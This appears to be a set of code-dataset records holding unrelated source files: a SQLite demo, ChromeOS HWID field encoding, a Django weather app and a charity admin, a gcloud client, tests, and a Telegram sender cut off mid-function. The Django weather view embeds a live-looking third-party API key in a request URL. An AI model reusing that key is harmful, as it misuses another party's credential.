R2D\n    \n    if(computeRefrEquatorial):\n        position.hourAngleRefract *= R2D\n        position.declinationRefract *= R2D\n    \n    return\n\n","repo_name":"astronomy/SolTrack","sub_path":"Python/soltrack/soltrack.py","file_name":"soltrack.py","file_ext":"py","file_size_in_byte":15013,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"}
+{"seq_id":"29354621539","text":"import sqlite3\n\n# link to SQLite database named mrsoft.db\nconn = sqlite3.connect('mrsoft.db')\n# create a cursor object\ncursor = conn.cursor()\n# execute a SQL statement to create a user table\ntry:\n    cursor.execute('create table user (id int(10) primary key, name varchar(20))')\nexcept:\n    print('user table already exists')\n\n# add user data\ncursor.execute('insert into user (id,name) values (\"1\",\"ethan\")')\n# view user data\ncursor.execute('select * from user')\nresult1 = cursor.fetchone()\nprint(result1)\n# update user data\ncursor.execute('update user set name =? 
where id=?',('xieruifeng',1))\ncursor.execute('select * from user')\nresult1 = cursor.fetchone()\nprint(result1)\n# delete user data\ncursor.execute('delete from user where id=?',(1,))\ncursor.execute('select * from user')\nresult1 = cursor.fetchone()\nprint(result1)\n# close cursor\ncursor.close()\n# commit work\nconn.commit()\n# close connection\nconn.close()\n","repo_name":"xerifg/py_project_demo","sub_path":"Database/SQLite_test.py","file_name":"SQLite_test.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71935467743","text":"from cros.factory.hwid.v3 import common\nfrom cros.factory.test import device_data_constants\n\n\nclass ConfiglessFields:\n \"\"\"ConfiglessFields class\n\n The format of configless fields is decided by FIELDS:\n\n `hex()-hex()-...-hex()`\n\n And the content of feature list field is decided by FEATURE_LIST[version]\n where version is FIELDS[0]. To make it easier to extend (that is, add\n 'has_new_feature' to the end of existing FEATURE_LIST[version]), always add\n a leading 1, so we can determine the length of feature list when it was\n encoded.\n\n For example,\n\n FIELDS = [\n 'version',\n 'memory',\n 'storage',\n 'feature_list'\n ]\n\n FEATURE_LIST = {\n 0: [\n 'has_touchscreen',\n 'has_touchpad',\n 'has_stylus',\n 'has_front_camera',\n 'has_rear_camera',\n 'has_fingerprint',\n 'is_convertible',\n 'is_rma_device'\n ]\n }\n\n encoded string \"0-8-74-180\" represents version 0, 8G memory, 116G storage and\n has touchscreen('180' is 0b110000000).\n\n If we extend version 0,\n\n FEATURE_LIST = {\n 0: [\n 'has_touchscreen',\n 'has_touchpad',\n 'has_stylus',\n 'has_front_camera',\n 'has_rear_camera',\n 'has_fingerprint',\n 'is_convertible',\n 'is_rma_device',\n 'has_new_feature',\n ]\n }\n\n then, feature list field '180' means has touchscreen and don't have value for\n 'has_new_feature'.\n \"\"\"\n\n FIELDS = [\n 'version', # version of feature list\n 'memory',\n 'storage',\n 'feature_list'\n ]\n\n FEATURE_LIST = {\n 0: [\n 'has_touchscreen',\n 'has_touchpad',\n 'has_stylus',\n 'has_front_camera',\n 'has_rear_camera',\n 'has_fingerprint',\n 'is_convertible',\n 'is_rma_device'\n ]\n }\n\n\n @classmethod\n def Encode(cls, db, bom, device_info, version, is_rma_device):\n \"\"\"Return a encoded string according to version.\n\n Args:\n db: a Database object that is used to provide device-specific\n information.\n :type database: cros.factory.hwid.v3.database.Database\n\n bom: a BOM object that lists components on current device.\n :type bom: cros.factory.hwid.v3.bom.BOM\n\n device_info: a dictionary follows definition in `device_data`.\n :type device_info: dict\n\n version: use _FeatureList_{version} to encode/decode feature list field.\n :type version: int\n\n Returns:\n A string of encoded configless fields.\n \"\"\"\n getter = _ConfiglessFieldGetter(\n db, bom, device_info, version, is_rma_device)\n return '-'.join(\n hex(getter(field)).upper().replace('0X', '') for field in cls.FIELDS)\n\n @classmethod\n def Decode(cls, encoded_string):\n \"\"\"Return a dict of decoded info.\n\n Args:\n encoded_string: a string generated by ConfiglessFields.Encode\n :type encoded_string: string\n\n Returns:\n A decoded dict.\n For example, a return dict\n {\n 'version': 0,\n 'memory': 8,\n 'storage' 116,\n 'feature_list': {\n 'has_touchscreen': 1,\n 'has_touchpad': 0,\n 'has_stylus': 0,\n 'has_front_camera': 0,\n 'has_rear_camera': 0,\n 'has_fingerprint': 0,\n 'is_convertible': 
0,\n 'is_rma_device': 0,\n }\n }\n means configless fileds version 0, 8G memory, 116G storage and has\n touchscreen.\n \"\"\"\n decoder = _ConfiglessFieldDecoder(encoded_string)\n fields = {\n field: decoder(field)\n for field in cls.FIELDS\n }\n return fields\n\n\nclass FeatureList:\n \"\"\"Encode/Decode feature list according to ConfiglessFields.FeatureList\"\"\"\n def __init__(self, version):\n self.features = ConfiglessFields.FEATURE_LIST[version]\n\n def Encode(self, components):\n encoded_value = 1\n for feature in self.features:\n encoded_value <<= 1\n encoded_value |= components.get(feature, 0)\n return encoded_value\n\n def Decode(self, encoded_value):\n feature_count = len(self.features)\n if encoded_value >= 2 ** (feature_count + 1):\n raise common.HWIDException(\n 'The given configless fields is invalid. The last field should be a '\n 'hex value in [0, %s].' %\n hex(2 ** (feature_count + 1) - 1).upper().replace('0X', ''))\n\n bin_string = bin(encoded_value).replace('0b', '')[1:]\n result = {\n self.features[i]: int(bin_string[i])\n for i in range(len(bin_string))\n }\n return result\n\n\nclass _ConfiglessFieldGetter:\n \"\"\"Extract value of from BOM / device_info for configless fields.\"\"\"\n def __init__(self, db, bom, device_info, version, is_rma_device):\n self._db = db\n self._bom = bom\n self._device_info = device_info or {}\n self._version = version\n self._is_rma_device = is_rma_device\n self._feature_list = FeatureList(version)\n\n def __call__(self, field_name):\n \"\"\"Get value of a field.\"\"\"\n return getattr(self, field_name)\n\n @property\n def memory(self):\n if self.is_rma_device and 'dram' not in self._bom.components:\n # We might be generating HWID for RMA spare boards, real DRAM info might\n # not be available until the spare board is mounted on device. So it's\n # okay to omit this field.\n return 0\n size_mb = sum(int(self._db.GetComponents('dram')[comp].values['size'])\n for comp in self._bom.components['dram'])\n return size_mb // 1024\n\n @property\n def storage(self):\n if self.is_rma_device and 'storage' not in self._bom.components:\n # We might be generating HWID for RMA spare boards, real storage info\n # might not be available until the spare board is mounted on device. So\n # it's okay to omit this field.\n return 0\n sectors = sum(int(self._db.GetComponents('storage')[comp].values['sectors'])\n for comp in self._bom.components['storage'])\n # Assume sector size is 512 bytes\n return sectors // 2 // 1024 // 1024\n\n @property\n def version(self):\n return self._version\n\n @property\n def is_rma_device(self):\n return self._is_rma_device\n\n @property\n def feature_list(self):\n \"\"\"Get feature list encoded string.\"\"\"\n components = self._device_info.get(device_data_constants.KEY_COMPONENT, {})\n # Set is_rma_device.\n components['is_rma_device'] = self._is_rma_device\n return self._feature_list.Encode(components)\n\n\nclass _ConfiglessFieldDecoder:\n \"\"\"Extract value of encoded string for configless fields.\"\"\"\n def __init__(self, encoded_string):\n encoded_fields = [int(field, 16) for field in encoded_string.split('-')]\n if len(encoded_fields) != len(ConfiglessFields.FIELDS):\n raise common.HWIDException(\n 'The given configless fields %r is invalid. It must have %r fields.' 
%\n (encoded_string, len(ConfiglessFields.FIELDS)))\n\n self._encoded_fields = dict(zip(ConfiglessFields.FIELDS, encoded_fields))\n self._feature_list = FeatureList(self._encoded_fields['version'])\n\n def __call__(self, field_name):\n \"\"\"Get decoded value of a field.\n\n By default, convert encoded hex string to integer.\n To override the behavior, create a property of field name\n (e.g. `feature_list`).\n \"\"\"\n try:\n return getattr(self, field_name)\n except Exception:\n return self._encoded_fields[field_name]\n\n @property\n def feature_list(self):\n \"\"\"Construct the dict of feature list\"\"\"\n return self._feature_list.Decode(self._encoded_fields['feature_list'])\n","repo_name":"arccode/factory","sub_path":"py/hwid/v3/configless_fields.py","file_name":"configless_fields.py","file_ext":"py","file_size_in_byte":7568,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"2728710924","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom django.contrib.auth import login, logout, authenticate\nfrom .forms import TodoForm\nfrom .models import Todo\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nimport requests\nimport json\nimport datetime\n\ndef home(request):\n return render(request, 'Weather/home.html')\n\n\n\n# Create your views here.\ndef signupuser(request):\n if request.method == 'GET':\n return render(request, 'Weather/signupuser.html', {'form':UserCreationForm()})\n else:\n if request.POST['password1'] == request.POST['password2']:\n try:\n user = User.objects.create_user(request.POST['username'], password=request.POST['password1'])\n user.save()\n login(request, user)\n return redirect('currenttodos')\n except IntegrityError:\n return render(request, 'Weather/signupuser.html',{'form': UserCreationForm(), 'error': 'Bu kullanıcı sisteme zaten kayıtlı'})\n else:\n return render(request, 'Weather/signupuser.html', {'form':UserCreationForm(), 'error':'Girilen Şifreler Uyuşmuyor'})\n\ndef loginuser(request):\n if request.method == 'GET':\n return render(request, 'Weather/loginuser.html', {'form': AuthenticationForm()})\n else:\n user = authenticate(request, username=request.POST['username'], password=request.POST['password'])\n if user is None:\n return render(request, 'Weather/loginuser.html', {'form': AuthenticationForm(), 'error': 'Kullanıcı Adı veya Şifre Hatalı'})\n else:\n login(request, user)\n return redirect('currenttodos')\n@login_required\ndef logoutuser(request):\n if request.method == 'POST':\n logout(request)\n return redirect('home')\n\n@login_required\ndef createtodo(request):\n if request.method == 'GET':\n\n return render(request, 'Weather/createtodo.html', {'form': TodoForm()})\n else:\n form = TodoForm(request.POST)\n global result\n global newtodo\n country = request.POST['title']\n numOfDays = request.POST['numDay']\n result = requests.get('http://api.worldweatheronline.com/premium/v1/weather.ashx?key=1e99431f9e6f443d90c123259202011&q='+country+'&format=json&num_of_days='+str(numOfDays))\n json_data = json.loads(result.text)\n request.session['myData'] = json_data\n request.session['dayN'] = numOfDays\n #newtodo = form.save(commit=False)\n #newtodo.memo = numOfDays\n #newtodo.user = request.user\n #newtodo.memo = 
json_data[\"data\"][\"weather\"][3][\"maxtempC\"]\n\n #newtodo.save()\n return redirect('currenttodos')\n #return JsonResponse({'Weather': json_data})\n #return render(request, 'Weather/currenttodos.html', {'title': result})\n\n@login_required\ndef currenttodos(request):\n try:\n jsonData = request.session['myData']\n numOfDays = request.session['dayN']\n test = \"Ankarada Ortalama Sıcaklık :\"+jsonData[\"data\"][\"weather\"][0][\"avgtempC\"]+\" Derece\"\n CurrentTemp = jsonData[\"data\"][\"current_condition\"][0][\"temp_C\"]\n CityName = jsonData[\"data\"][\"request\"][0][\"query\"]\n humidtyC = jsonData[\"data\"][\"current_condition\"][0][\"humidity\"]\n Date = []\n avgTemp = []\n FeelsLikeC = jsonData[\"data\"][\"current_condition\"][0][\"FeelsLikeC\"]\n Weather=jsonData[\"data\"][\"current_condition\"][0][\"weatherDesc\"][0][\"value\"]\n WeatherAvg= []\n Icon=jsonData[\"data\"][\"current_condition\"][0][\"weatherIconUrl\"][0][\"value\"]\n timeW = []\n nextDates = []\n Day = datetime.datetime.now()\n DayList = []\n #Clock = datetime.datetime.now().strftime(\"%H:%M:%S\")\n maxTemp = []\n minTemp=[]\n sunrise=[]\n sunset = []\n sunHour =[]\n weatherDesc=[]\n for i in range(8): # Saatlik Hava\n timeW.append(jsonData[\"data\"][\"weather\"][0][\"hourly\"][i][\"tempC\"])\n\n if numOfDays == \"5\":\n for i in range(5):\n Date.append(jsonData[\"data\"][\"weather\"][i][\"date\"])\n avgTemp.append(jsonData[\"data\"][\"weather\"][i][\"avgtempC\"])\n maxTemp.append(jsonData[\"data\"][\"weather\"][i][\"maxtempC\"])\n minTemp.append(jsonData[\"data\"][\"weather\"][i][\"mintempC\"])\n sunrise.append(jsonData[\"data\"][\"weather\"][i][\"astronomy\"][0][\"sunrise\"])\n sunset.append(jsonData[\"data\"][\"weather\"][i][\"astronomy\"][0][\"sunset\"])\n sunHour.append(jsonData[\"data\"][\"weather\"][i][\"sunHour\"])\n WeatherAvg.append(jsonData[\"data\"][\"weather\"][i][\"hourly\"][4][\"weatherIconUrl\"][0][\"value\"])\n weatherDesc.append(jsonData[\"data\"][\"weather\"][i][\"hourly\"][4][\"weatherDesc\"][0][\"value\"])\n DayList.append(Day.strftime(\"%A\"))\n Day += datetime.timedelta(days=1)\n else:\n for i in range(3):\n Date.append(jsonData[\"data\"][\"weather\"][i][\"date\"])\n avgTemp.append(jsonData[\"data\"][\"weather\"][i][\"avgtempC\"])\n maxTemp.append(jsonData[\"data\"][\"weather\"][i][\"maxtempC\"])\n minTemp.append(jsonData[\"data\"][\"weather\"][i][\"mintempC\"])\n sunrise.append(jsonData[\"data\"][\"weather\"][i][\"astronomy\"][0][\"sunrise\"])\n sunset.append(jsonData[\"data\"][\"weather\"][i][\"astronomy\"][0][\"sunset\"])\n sunHour.append(jsonData[\"data\"][\"weather\"][i][\"sunHour\"])\n WeatherAvg.append(jsonData[\"data\"][\"weather\"][i][\"hourly\"][4][\"weatherIconUrl\"][0][\"value\"])\n weatherDesc.append(jsonData[\"data\"][\"weather\"][i][\"hourly\"][4][\"weatherDesc\"][0][\"value\"])\n DayList.append(Day.strftime(\"%A\"))\n Day += datetime.timedelta(days=1)\n\n\n\n\n\n if request.method == 'GET':\n return render(request, 'Weather/currenttodos.html', {'test': test, 'CurrentTemp': CurrentTemp, 'CityName': CityName, 'DayList' : DayList, 'Date': Date, 'Weather': Weather, 'Icon': Icon, 'timeW': timeW, 'numOfDays':numOfDays, 'avgTemp':avgTemp, 'humidtyC': humidtyC, 'FeelsLikeC':FeelsLikeC, 'WeatherAvg':WeatherAvg, 'minTemp':minTemp, 'maxTemp':maxTemp, 'sunrise':sunrise,'sunset':sunset, 'sunHour':sunHour,'weatherDesc':weatherDesc})\n except:\n return 
redirect('createtodo')\n\n","repo_name":"cankatcanbul/Barikat","sub_path":"HavaDurumu/Weather/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35451444520","text":"#!/usr/bin/env python3\n\n\nimport roslaunch\nimport rospy\nimport os\n\nhome_path = os.environ['HOME']\nrospy.init_node('launch_demo_world', anonymous=True)\n#---------------------REAL ENV-------------------------\n\nuuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\nroslaunch.configure_logging(uuid)\nlaunch = roslaunch.parent.ROSLaunchParent(uuid, [home_path + '/5755_ws/src/team-park/park_demo/park_demo/launch/camera.launch'])\nlaunch.start()\nrospy.loginfo(\"started Realsense Node\")\nrospy.sleep(10)\nrospy.sleep(36000) #10 hours later......\n","repo_name":"mfkenson/MAEG5755-2021-Team-PARK","sub_path":"park_demo/park_demo/scripts/launcher/launch_demo_real.py","file_name":"launch_demo_real.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"10726309572","text":"from pprint import pprint\n\nwith open(\"7-input.txt\") as fin:\n data = fin.read()\n\ntree = {}\n\nrule = \"clear tomato bags contain 4 dotted magenta bags, 1 dull chartreuse bag, 2 dim aqua bags, 1 dull brown bag.\"\n\ndef add_parents(rule):\n split = rule.split(\" \")\n parent = \" \".join(split[:split.index(\"contain\") - 1])\n\n if not parent in tree:\n tree[parent] = set()\n\n childList = \" \".join(split[split.index(\"contain\") + 1:]).split(\", \")\n for cString in childList:\n if cString == \"no other bags.\":\n continue\n\n parts = cString.split(\" \")\n amount = int(parts[0])\n bagName = \" \".join(parts[1:-1])\n tree[parent].add((amount, bagName))\n\n\nrules = data.split(\"\\n\")\nfor r in rules:\n add_parents(r)\n\nanswer = 0\ndfs = [(1, \"shiny gold\")]\nseen = set()\n\nwhile len(dfs) > 0:\n amount, color = dfs.pop()\n answer += amount\n\n #seen.add(pop)\n \n if color in tree:\n children = tree[color]\n for n, child in children:\n dfs.append((n * amount, child))\n\n\nprint(answer - 1)","repo_name":"womogenes/AoC-2020-solutions","sub_path":"07/7.2.py","file_name":"7.2.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"35729967264","text":"from ast import Pass\nfrom django.db.models import Sum\nfrom django.contrib import admin\nfrom . 
import models\n# Register your models here.\n@admin.register(models.Assign)\nclass AdminAssign(admin.ModelAdmin):\n list_display=[\n 'sandogh_khayerieh',\n 'khayer_full_name',\n 'tahvilgirandeh',\n 'date'\n ]\n def khayer_full_name(self,assign:models.Assign):\n return assign.sandogh_khayerieh.khayer.last_name+' '+assign.sandogh_khayerieh.khayer.first_name\n \n list_select_related=[\n 'sandogh_khayerieh',\n 'tahvilgirandeh',\n ]\n list_filter=[\n 'sandogh_khayerieh',\n 'tahvilgirandeh',\n 'date'\n \n \n ]\n search_fields=[\n 'sandogh_khayerieh__khayer__first_name',\n 'sandogh_khayerieh__khayer__last_name',\n 'sandogh_khayerieh__code',\n 'tahvilgirandeh__first_name',\n 'tahvilgirandeh__last_name',\n ]\n \n@admin.register(models.Payment)\nclass AdminPayment(admin.ModelAdmin):\n list_display=['pk',\n 'khayer',\n 'sandogh_khayerieh',\n 'tahvilgirandeh_sandogh',\n 'amount',\n 'date'\n ]\n search_fields=['pk',\n 'khayer__first_name',\n 'khayer__last_name',\n 'sandogh_khayerieh__code',\n 'tahvilgirandeh_sandogh__first_name',\n 'tahvilgirandeh_sandogh__last_name',\n 'amount',\n ]\n #list_editable=['date']\n list_filter=[\n 'id',\n 'date',\n 'khayer',\n 'sandogh_khayerieh',\n 'tahvilgirandeh_sandogh',\n ]\n ordering=['date']\n list_per_page=15\n\n@admin.register(models.Khayer)\nclass AdminKhayer(admin.ModelAdmin):\n list_display=['pk',\n 'last_name',\n 'first_name',\n 'phone_number',\n 'sum_of_helps',\n 'creating_date'\n ]\n search_fields=[\n 'pk',\n 'last_name',\n 'first_name',\n 'phone_number',\n ]\n #list_editable=['first_name']\n #ordering=['']\n list_per_page=15\n\n def sum_of_helps(self,khayer):\n return khayer.sum_of_helps2\n def get_queryset(self, request):\n return super().get_queryset(request).annotate(\n sum_of_helps2=Sum('payment__amount')\n )\n \n@admin.register(models.HesabMoaseseh)\nclass AdminHesabMoaseseh(admin.ModelAdmin):\n list_display=['name',\n 'account_number',\n 'cart_number',\n 'sum_of_balance'\n ]\n search_fields=['name']\n def sum_of_balance(self,hesab_moaseseh):\n if hesab_moaseseh.Pay != None and hesab_moaseseh.Recive !=None:\n return hesab_moaseseh.Recive -hesab_moaseseh.Pay\n if hesab_moaseseh.Pay == None:\n return (-1)*hesab_moaseseh.Recive\n return hesab_moaseseh.Pay\n def get_queryset(self, request):\n return super().get_queryset(request).annotate(\n \n Recive=Sum('payment__amount'),\n Pay=Sum('helping__amount')\n \n )\n \n #list_editable=['']\n #ordering=['']\n list_per_page=15\n \n\n@admin.register(models.Madadjo)\nclass AdminMadadjo(admin.ModelAdmin):\n list_display=['first_name',\n 'last_name',\n 'status',\n 'sum_of_helped_recived',\n 'creating_date'\n ]\n search_fields=[\n 'pk',\n 'last_name',\n 'first_name',\n 'phone_number',\n 'status',\n ]\n #list_editable=['']\n #ordering=['']\n list_per_page=15\n def sum_of_helped_recived(self,madadjo):\n return madadjo.sum\n def get_queryset(self, request):# set fillter for save or pay\n\n return super().get_queryset(request).annotate(\n sum=Sum('helping__amount')\n )\n \n #list_editable=['']\n #ordering=['']\n list_per_page=15\n \n\n@admin.register(models.TahvilgirandehSandogh)\nclass AdminTahvilgirandehSandogh(admin.ModelAdmin):\n list_display=['first_name',\n 'last_name',\n 'phone_number'\n ]\n search_fields=['first_name',\n 'last_name',\n 'phone_number'\n ]\n #list_editable=['']\n #ordering=['']\n list_per_page=15\n\n@admin.register(models.SandoghKhayerieh)\nclass AdminSandoghKhayerieh(admin.ModelAdmin):\n list_display=['pk',\n 'khayer'\n ]\n search_fields=[\n 'pk',\n 'khayer__first_name',\n 'khayer__last_name',\n ]\n 
#list_editable=['']\n #ordering=['']\n list_per_page=15\n\n@admin.register(models.Helping)\nclass AdminHelping(admin.ModelAdmin):\n list_display=['madadjo',\n 'hesab_moaseseh',\n 'amount',\n 'date'\n ]\n \n search_fields=['madadjo__first_name',\n 'madadjo__last_name',\n 'hesab_moaseseh__name',\n 'amount',\n 'date'\n ]\n #list_editable=['']\n \n ordering=['date']\n list_per_page=15\n\n","repo_name":"shahab2021/BaranRahmatCharity","sub_path":"project/management/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27760723819","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.accesscontextmanager import util\nfrom googlecloudsdk.api_lib.util import waiter\n\nfrom googlecloudsdk.core import resources\n\n\nclass Client(object):\n\n def __init__(self, client=None, messages=None, version=None):\n self.client = client or util.GetClient(version=version)\n self.messages = messages or self.client.MESSAGES_MODULE\n\n def Patch(self,\n level_ref,\n description=None,\n title=None,\n basic_level_combine_function=None,\n basic_level_conditions=None,\n custom_level_expr=None):\n \"\"\"Patch an access level.\n\n Args:\n level_ref: resources.Resource, reference to the level to patch\n description: str, description of the level or None if not updating\n title: str, title of the level or None if not updating\n basic_level_combine_function: ZoneTypeValueValuesEnum, combine function\n enum value of the level or None if not updating\n basic_level_conditions: list of Condition, the conditions for a basic\n level or None if not updating\n custom_level_expr: the expression of the Custom level, or none if not\n updating.\n\n Returns:\n AccessLevel, the updated access level\n \"\"\"\n level = self.messages.AccessLevel()\n update_mask = []\n if description is not None:\n update_mask.append('description')\n level.description = description\n if title is not None:\n update_mask.append('title')\n level.title = title\n if basic_level_combine_function is not None:\n update_mask.append('basic.combiningFunction')\n level.basic = level.basic or self.messages.BasicLevel()\n level.basic.combiningFunction = basic_level_combine_function\n if basic_level_conditions is not None:\n update_mask.append('basic.conditions')\n level.basic = level.basic or self.messages.BasicLevel()\n level.basic.conditions = basic_level_conditions\n if custom_level_expr is not None:\n update_mask.append('custom')\n level.custom = level.custom or self.messages.CustomLevel()\n level.custom.expr = custom_level_expr\n update_mask.sort() # For ease-of-testing\n\n m = self.messages\n request_type = m.AccesscontextmanagerAccessPoliciesAccessLevelsPatchRequest\n request = request_type(\n accessLevel=level,\n name=level_ref.RelativeName(),\n updateMask=','.join(update_mask),\n )\n operation = self.client.accessPolicies_accessLevels.Patch(request)\n\n poller = util.OperationPoller(self.client.accessPolicies_accessLevels,\n self.client.operations, level_ref)\n operation_ref = resources.REGISTRY.Parse(\n operation.name, collection='accesscontextmanager.operations')\n return waiter.WaitFor(\n poller, operation_ref,\n 'Waiting for PATCH operation 
[{}]'.format(operation_ref.Name()))\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/accesscontextmanager/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"36513158074","text":"import pytest\n\nfrom server.service.error.type.consistency_error import ConsistencyError\nfrom server.service.strategy.base import BaseStrategy\n\ndefault_pick_list = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\"]\n\n\ndef test_base_create_weight_list():\n assert BaseStrategy.create_weight_list(3) == [1 / 3, 1 / 3, 1 / 3]\n\n\ndef test_base_strategy_creation():\n weight_list = [1 / 3, 2 / 3]\n strategy = BaseStrategy(\n pick_list=default_pick_list[: len(weight_list)], weight_list=weight_list\n )\n assert strategy.weight_list == weight_list\n\n\ndef test_base_strategy_creation_round_sum():\n weight_list = [0.999999999999]\n try:\n BaseStrategy(\n pick_list=default_pick_list[: len(weight_list)], weight_list=weight_list\n )\n except Exception:\n pytest.fail(\"Should not fail even if the weight list is not exactly 1\")\n\n\n@pytest.mark.parametrize(\n \"pick_list, weight_list, error_message\",\n [\n ([], [1], \"Can't pick an item from an empty pick list.\"),\n (default_pick_list, [], \"Weight list must not be empty.\"),\n (\n default_pick_list,\n [1],\n \"Pick list and weight list muse have the same length.\",\n ),\n (default_pick_list[:2], [1, 2], \"Weight list must sum up to 1.\"),\n ],\n)\ndef test_base_strategy_creation_error(pick_list, weight_list, error_message):\n with pytest.raises(ConsistencyError, match=error_message):\n BaseStrategy(pick_list=pick_list, weight_list=weight_list)\n\n\n@pytest.mark.parametrize(\n \"items_to_add, value, expected_weight_list\",\n [\n ([], None, [1 / 3, 2 / 3]),\n ([\"c\"], None, [2 / 9, 4 / 9, 3 / 9]),\n ([\"c\"], 1, [1 / 6, 1 / 3, 1 / 2]),\n ([\"c\"], 0, [1 / 3, 2 / 3, 0]),\n ([\"c\", \"d\"], None, [2 / 12, 4 / 12, 3 / 12, 3 / 12]),\n ],\n)\ndef test_base_strategy_add_items(items_to_add, value, expected_weight_list):\n weight_list = [1 / 3, 2 / 3]\n strategy = BaseStrategy(\n pick_list=default_pick_list[: len(weight_list)], weight_list=weight_list\n )\n strategy.add_items(items_to_add, value)\n assert strategy.pick_list == default_pick_list[: len(weight_list)] + items_to_add\n assert [round(el, 6) for el in strategy.weight_list] == [\n round(el, 6) for el in expected_weight_list\n ]\n\n\n@pytest.mark.parametrize(\n \"items_indices, expected_pick_list, expected_weight_list\",\n [\n ([], default_pick_list[:3], [1 / 6, 2 / 6, 3 / 6]),\n ([0], default_pick_list[1:3], [2 / 5, 3 / 5]),\n ([1], [default_pick_list[0], default_pick_list[2]], [1 / 4, 3 / 4]),\n ([2], default_pick_list[:2], [1 / 3, 2 / 3]),\n ([0, 1], [default_pick_list[2]], [1]),\n ],\n)\ndef test_base_strategy_remove_item(\n items_indices, expected_pick_list, expected_weight_list\n):\n pick_list = default_pick_list[:3]\n weight_list = [1 / 6, 2 / 6, 3 / 6]\n strategy = BaseStrategy(pick_list=pick_list, weight_list=weight_list)\n strategy.remove_items(items_indices)\n assert strategy.pick_list == expected_pick_list\n assert [round(el, 6) for el in strategy.weight_list] == [\n round(el, 6) for el in expected_weight_list\n 
]\n","repo_name":"EtienneTurc/IChooseYou","sub_path":"server/service/strategy/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"8974627394","text":"\"\"\"\nYou're expected to send messages via queues (async): *message_queue*.\nThis is a module with underlying synchronous implementation.\n\"\"\"\nimport logging\nimport time\nfrom typing import Iterable\n\nfrom telegram import Bot, Message as TgMessage\nfrom telegram.error import Unauthorized, BadRequest\n\nfrom rest_food.db import set_inactive\nfrom rest_food.entities import Reply\nfrom rest_food.enums import Provider, Workflow\nfrom rest_food.settings import TEST_TG_CHAT_ID, TELEGRAM_TOKEN_DEMAND, TELEGRAM_TOKEN_SUPPLY, STAGE\n\nlogger = logging.getLogger(__name__)\n\n\nclass FakeBot:\n sleep_time = 0.2\n\n def __init__(self, bot: Bot):\n self._bot = bot\n\n def _sleep(self):\n logger.warning('Sleep for %s s', self.sleep_time)\n time.sleep(0.2)\n\n def send_location(self, chat_id, *args, **kwargs):\n if chat_id in TEST_TG_CHAT_ID:\n return self._bot.send_location(chat_id, *args, **kwargs)\n else:\n self._sleep()\n\n def edit_message_text(self, text, chat_id, *args, **kwargs):\n if chat_id in TEST_TG_CHAT_ID:\n return self._bot.edit_message_text(text, chat_id, *args, **kwargs)\n else:\n self._sleep()\n\n def send_message(self, chat_id, *args, **kwargs):\n if chat_id in TEST_TG_CHAT_ID:\n return self._bot.send_message(chat_id, *args, **kwargs)\n else:\n self._sleep()\n\n def delete_message(self, chat_id, *args, **kwargs):\n if chat_id in TEST_TG_CHAT_ID:\n return self._bot.delete_message(chat_id, *args, **kwargs)\n else:\n self._sleep()\n\n def set_webhook(self, *args, **kwargs):\n return self._bot.set_webhook(*args, **kwargs)\n\n\ndef get_bot(workflow: Workflow):\n if workflow == Workflow.SUPPLY:\n token = TELEGRAM_TOKEN_SUPPLY\n else:\n token = TELEGRAM_TOKEN_DEMAND\n\n bot = Bot(token)\n\n if STAGE == 'dev':\n return FakeBot(bot)\n\n return bot\n\n\ndef send_messages(\n *,\n tg_chat_id: int,\n original_message: TgMessage = None,\n replies: Iterable[Reply],\n workflow: Workflow\n):\n \"\"\"\n It's intended to be async (vs `build_tg_response`).\n \"\"\"\n bot = get_bot(workflow)\n original_message_can_be_replaced = (\n (original_message and original_message.message_id) is not None\n )\n\n for reply in filter(lambda x: x is not None and (x.text or x.coordinates) is not None, replies):\n markup = _build_tg_reply_markup(reply)\n\n if reply.coordinates:\n bot.send_location(\n tg_chat_id,\n *(float(x) for x in reply.coordinates),\n reply_markup=None if reply.text else markup,\n )\n\n original_message_should_be_removed = original_message_can_be_replaced\n\n if reply.text:\n kwargs = {\n 'chat_id': tg_chat_id,\n 'text': reply.text,\n 'reply_markup': markup,\n 'parse_mode': 'HTML',\n }\n\n if original_message_can_be_replaced and original_message.text is not None and not reply.is_text_buttons:\n method = bot.edit_message_text\n original_message_should_be_removed = False\n kwargs['message_id'] = original_message.message_id\n else:\n method = bot.send_message\n\n # Actually we can keep track of sent `keyboard` messages and remove them on the next\n # interaction with the user.\n # On the other hand this is not likely to happen as this method is designed to query db.\n kwargs['reply_markup'] = kwargs['reply_markup'] or {'remove_keyboard': True}\n\n try:\n method(**kwargs)\n except Unauthorized:\n 
